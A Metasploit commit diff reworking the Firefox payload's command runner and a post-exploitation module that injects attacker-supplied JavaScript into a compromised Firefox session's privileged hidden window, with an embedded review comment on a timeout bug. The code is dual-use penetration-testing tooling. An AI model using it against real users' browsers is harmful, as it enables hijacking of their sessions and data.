
Use shell primitives instead of resorting to echo hacks.
This commit is contained in:
Joe Vennix 2014-01-04 19:00:36 -06:00
parent 4329e5a21e
commit f2f68a61aa
2 changed files with 16 additions and 17 deletions


@ -47,7 +47,7 @@ module Msf::Payload::Firefox
# redirects stdout. A JScript "launch" file is dropped and invoked with wscript
# to run the command without displaying the cmd.exe prompt.
#
# When the command contains the pattern ",JAVASCRIPT, ... ,ENDSCRIPT,", the
# When the command contains the pattern "[JAVASCRIPT] ... [/JAVASCRIPT]", the
# javascript code between the tags is eval'd and returned.
#
# @return [String] javascript source code that exposes the runCmd(str) method.
@ -59,18 +59,12 @@ module Msf::Payload::Firefox
var svcs = Components.utils.import("resource://gre/modules/Services.jsm");
var jscript = (#{JSON.unparse({:src => jscript_launcher})}).src;
var runCmd = function(cmd, cb) {
var echo = function(str) {
if(!str \|\| !str.length) return '';
var e = str.match(/echo ['"]?([^;\\s"']+)/);
return (e && e[1]) \|\| '';
}
var js = (/,JAVASCRIPT,([\\s\\S]*),ENDSCRIPT,/g).exec(cmd.trim());
if (cmd.trim().length == 0) return;
var js = (/^\\s*\\[JAVASCRIPT\\]([\\s\\S]*)\\[\\/JAVASCRIPT\\]/g).exec(cmd.trim());
if (js) {
var wcmd = (windows) ? cmd+"\\n" : '';
var cmds = cmd.split(js[0]).map(function(s){return s.trim().replace(/^\\s*;/, "")});
Function('cb', js[1])(function(r) {
cb(wcmd+echo(cmds[0])+"\\n"+r+"\\n"+echo(cmds[1]))
})
var tag = "[!JAVASCRIPT]";
Function('send', js[1])(function(r){ if (r) cb(r+tag+"\\n"); });
return;
}
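Review bot: The `[!JAVASCRIPT]` terminator is only written when the script's result is truthy — `if (r) cb(r+tag+"\\n");` on the `Function('send', js[1])` line — so a script whose `send` is called with an empty string, 0, or nothing at all never closes the exchange, and the reader side (`shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT'])` in the post module) blocks for the full TIMEOUT with no output. Emit the tag unconditionally and only elide a missing result, e.g. `Function('send', js[1])(function(r){ cb((r == null ? '' : r)+tag+"\\n"); });`, so an empty result still returns promptly. The header comment in the first hunk still says the code is "eval'd and returned"; it would help to state there that the script receives a `send(str)` callback and that each call is terminated by `[!JAVASCRIPT]`. runCmd begins inside this hunk but its body continues past the closing `}` of the `if (js)` block.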


@ -35,7 +35,8 @@ class Metasploit3 < Msf::Post
end
def run
results = cmd_exec(",JAVASCRIPT,#{js_payload},ENDSCRIPT,", nil, datastore['TIMEOUT'])
session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]")
results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT'])
if results.present?
print_good results
@ -48,15 +49,15 @@ class Metasploit3 < Msf::Post
js = datastore['SCRIPT'].strip
%Q|
(function(){
(function(send){
var hiddenWindow = Components.classes["@mozilla.org/appshell/appShellService;1"]
.getService(Components.interfaces.nsIAppShellService)
.hiddenDOMWindow;
hiddenWindow.location = 'about:blank';
var src = (#{JSON.unparse({ :src => js })}).src;
var XHR = hiddenWindow.XMLHttpRequest;
var key = "#{Rex::Text.rand_text_alphanumeric(8+rand(12))}";
hiddenWindow[key] = true;
hiddenWindow.location = "#{datastore['URL']}";
@ -65,7 +66,11 @@ class Metasploit3 < Msf::Post
schedule(evt);
} else {
schedule(function(){
cb(hiddenWindow.Function(src)());
try {
send(hiddenWindow.Function('send', src)(send));
} catch (e) {
send("Error: "+e.message);
}
}, 500);
}
};
@ -77,7 +82,7 @@ class Metasploit3 < Msf::Post
};
schedule(evt);
})();
})(send);
|.strip
end